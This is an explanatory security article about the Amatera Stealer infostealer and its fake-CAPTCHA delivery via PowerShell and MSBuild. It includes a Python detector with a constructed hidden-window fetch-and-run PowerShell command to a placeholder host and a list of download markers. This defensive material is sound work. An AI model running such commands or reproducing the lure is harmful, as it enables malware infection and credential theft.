The Rise of Amatera Stealer

Imagine visiting a normal website, solving a simple CAPTCHA, and suddenly your passwords, credit cards, and crypto wallets are stolen. That’s exactly what’s happening with Amatera Stealer, a highly advanced piece of malware that is now spreading rapidly.

Security experts have confirmed that this isn’t just another virus: it’s an upgraded, more dangerous version of the older ACR Stealer, packed with new tricks to evade detection.

Worse yet, it’s being sold for just $199 on hacker forums, making it cheap and accessible to cybercriminals worldwide.

From ACR to Amatera: A Malware Reborn

Back in July 2024, the creators of ACR Stealer suddenly announced they were shutting down. But their farewell message hinted at a return, and by December 2024 Amatera Stealer had emerged.

Researchers at Proofpoint found that Amatera uses the same core hacking tools as ACR but with major improvements:

  • Better anti-detection (harder for antivirus to spot)

  • Smarter delivery methods (no shady email attachments)

  • Blockchain-based attacks (making takedowns nearly impossible)

The malware specializes in stealing:

  • Saved passwords (Chrome, Firefox, Edge)

  • Credit card details (from autofill data)

  • Cryptocurrency wallets (MetaMask, Exodus, etc.)

  • Important documents (PDFs, Word files, databases)

How the Attack Works (Step by Step)

1. You Visit a Hacked Website

Cybercriminals inject malicious code into legitimate sites, often through fake ads or phishing links.

2. A Fake CAPTCHA Appears

Instead of a real CAPTCHA, you see a fake verification screen telling you to:

  • Press Windows Key + R (opens the Run command)

  • Paste a malicious PowerShell script

  • Hit Enter (triggering the malware)

3. The Malware Installs Silently

The script downloads a harmless-looking C# file and runs it using Microsoft’s own MSBuild tool, a trick that bypasses most security software.

4. Your Data Gets Stolen

Once inside, Amatera quietly collects:

  • Browser passwords

  • Crypto wallet keys

  • Session cookies (letting hackers log into your accounts)

  • Screenshots & clipboard data

Why This Malware Is So Hard to Stop

Unlike old-school viruses, Amatera uses real Windows tools to avoid suspicion. Here’s what makes it dangerous:

  • No Suspicious Downloads: It doesn’t rely on shady .exe files.

  • Uses Legitimate Software: MSBuild is a real Microsoft tool.

  • Hosted on Blockchain: Parts of the attack are stored on Binance Smart Chain, making takedowns difficult.

Even worse, victims often don’t realize they’re infected until it’s too late.
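The attack chain described in "How the Attack Works" and the "real Windows tools" point above leave a recognisable trail in process-creation telemetry: explorer.exe (the Run dialog) launching PowerShell with a hidden window and a download command, and PowerShell then launching MSBuild on a file in a temp folder. The following is an added detection example written for this page; it is not code from the original article, from Proofpoint, or from any product. The events, the registry values and the `example.invalid` address are all constructed and labelled as such, and the field names mirror the shape of Sysmon process-creation events as an assumption about what a defender's logs look like.

```python
"""Detection sketch for the fake-CAPTCHA -> PowerShell -> MSBuild chain.

Input is a list of constructed process-creation events (Sysmon Event ID 1
style fields) plus a constructed copy of the Run-dialog history (RunMRU).
Nothing here is real telemetry.
"""
import re
from typing import Iterable

# Command-line fragments that fetch or decode code; matched case-insensitively.
DOWNLOAD_MARKERS = ("invoke-webrequest", "invoke-restmethod", "iwr ", "irm ",
                    "downloadstring", "net.webclient", "frombase64string")
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden")
# Folders a normal developer build would not use as a project location.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed sample events; hypothetical paths and a placeholder domain.
SAMPLE_EVENTS = [
    {   # a user opening a console from the Run dialog: benign
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
    {   # Run-dialog launch with a hidden window and a remote download: suspicious
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "irm https://example.invalid/a | iex"',
    },
    {   # PowerShell handing a file in %TEMP% to MSBuild: suspicious
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "CommandLine": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\stage.xml",
    },
    {   # a normal Visual Studio build: benign
        "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
        "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "CommandLine": r"MSBuild.exe C:\src\app\app.csproj",
    },
]

# Constructed RunMRU values (not a real registry export). Windows stores each
# Run-dialog entry as "<command>\1" under a one-letter value name and keeps
# the most-recent-first order in the "MRUList" string.
SAMPLE_RUN_MRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm https://example.invalid/a | iex"\\1',
    "c": "calc\\1",
    "MRUList": "bca",
}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def flag_event(event: dict) -> list[str]:
    """Return the reasons an event matches the chain; an empty list means benign."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    reasons = []
    if parent == "explorer.exe" and image in ("powershell.exe", "pwsh.exe"):
        # Win+R launches have explorer.exe as the parent, but so does a console
        # the user opened by hand, so require a hidden window or a download
        # primitive before flagging.
        if HIDDEN_WINDOW.search(cmd) or any(m in cmd for m in DOWNLOAD_MARKERS):
            reasons.append("powershell from Run dialog with hidden window or download")
    if image == "msbuild.exe":
        if parent in ("powershell.exe", "pwsh.exe", "cmd.exe"):
            reasons.append("msbuild spawned by a shell")
        if any(p in cmd for p in USER_WRITABLE):
            reasons.append("msbuild project file in a user-writable path")
    return reasons


def scan_events(events: Iterable[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for each flagged event, in input order."""
    return [(i, r) for i, ev in enumerate(events) if (r := flag_event(ev))]


def scan_run_mru(values: dict) -> list[str]:
    """Run-dialog history entries that invoked PowerShell, most recent first."""
    hits = []
    for name in values.get("MRUList", ""):
        entry = values.get(name, "")
        cmd = entry[:-2] if entry.endswith("\\1") else entry
        if "powershell" in cmd.lower() or "pwsh" in cmd.lower():
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for index, reasons in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: {'; '.join(reasons)}")
    for cmd in scan_run_mru(SAMPLE_RUN_MRU):
        print(f"RunMRU: {cmd}")
```

Run against the constructed input, events 1 and 2 are flagged (the hidden-window download and the shell-spawned MSBuild on a temp-folder file) while the hand-opened console and the Visual Studio build are not, and the RunMRU scan recovers the pasted command from the Run-dialog history even after the process has exited. The parent-process condition matters: flagging every PowerShell launch would bury the alert in noise, so the rule keys on the combination the page describes rather than on PowerShell alone.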

How to Protect Yourself (6 Essential Steps)

Since Amatera spreads through fake CAPTCHAs and hacked sites, here’s how to stay safe:

  1. Never run random PowerShell commands: No real CAPTCHA asks for this.

  2. Use a password manager: It encrypts logins, making them harder to steal.

  3. Enable 2FA everywhere: Even if hackers get your password, they can’t log in.

  4. Keep software updated: Many attacks exploit old security holes.

  5. Install a strong antivirus: Some can detect sneaky PowerShell attacks.

  6. Be wary of unknown sites: If a CAPTCHA seems odd, close the tab.

Final Warning: Stay Alert

Amatera Stealer proves that hackers are getting smarter, using trusted tools and sneaky tricks to avoid detection. The best defense? Staying informed and cautious.
